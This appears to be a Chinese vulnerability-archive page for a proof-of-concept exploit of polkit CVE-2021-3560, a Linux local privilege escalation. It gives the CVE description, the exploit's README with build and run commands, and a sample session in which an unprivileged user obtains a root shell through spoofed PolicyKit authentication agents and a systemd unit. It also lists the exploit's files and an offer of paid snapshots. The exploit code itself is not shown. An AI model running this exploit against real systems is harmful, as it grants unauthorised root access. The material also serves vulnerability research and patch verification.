关联漏洞
标题:
polkit 代码问题漏洞
(CVE-2021-3560)
描述:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则,实现不同优先级进程间的通讯。 polkit 存在代码问题漏洞,该漏洞源于当请求进程在调用polkit_system_bus_name_get_creds_sync之前断开与dbus-daemon的连接时,该进程无法获得进程的唯一uid和pid,也无法验证请求进程的特权。
描述
PolicyKit CVE-2021-3560 Exploit (Authentication Agent)
介绍
PolicyKit CVE-2021-3560 Exploit (Authentication Agent)
====
### Technology Details
Blog posts about this exploit :
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation
## Build & Usage
```
nobody@test:/tmp/CVE-2021-3560$ go build
nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service
=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===
pid-267920 - [*] Registering PolicyKit authentication agent ...
...
pid-267915 - [-] Exploit failed, please try again
nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service
=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===
pid-267963 - [*] Registering PolicyKit authentication agent ...
pid-267963 - [*] Authentication agent main loop running ...
pid-267968 - [*] Registering PolicyKit authentication agent ...
pid-267973 - [*] Registering PolicyKit authentication agent ...
pid-267968 - [*] Authentication agent main loop running ...
pid-267973 - [*] Authentication agent main loop running ...
pid-267963 - [*] Starting systemd service 'pwnkit.service' ...
pid-267968 - [*] Enabling systemd unit file '/tmp/pwnkit.service' ...
pid-267973 - [*] Reloading systemd daemon ...
pid-267963 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-units'
pid-267963 - [*] Cookie: 100-9b8357901e7f4f4847cbd15a3d191cc4-1-10167c9df23ebe27c57534750f48ef7a
pid-267968 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-unit-files'
pid-267968 - [*] Cookie: 101-48273279f75230e86c9ad5df212ee54d-1-a86a81adcf07ad16ab6017a21235da80
pid-267973 - [+] Received authentication request for action: 'org.freedesktop.systemd1.reload-daemon'
pid-267973 - [*] Cookie: 102-3fb9b174b470f5d04881cbfeb16a60d0-1-8a36d3a7f9aca22af0a0f8562f20dbe2
pid-267958 - [+] File exists, popping root shell ...
pwned-5.0# id
uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root),65534(nogroup)
```
## License
Apache License
文件快照
[4.0K] /data/pocs/9f70ecc6024b1f70c252c56e16ba7d56839864e1
├── [2.6K] agent.go
├── [3.9K] exploit.go
├── [ 72] go.mod
├── [ 260] go.sum
├── [ 11K] LICENSE
├── [ 205] pwnkit.service
└── [2.1K] README.md
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。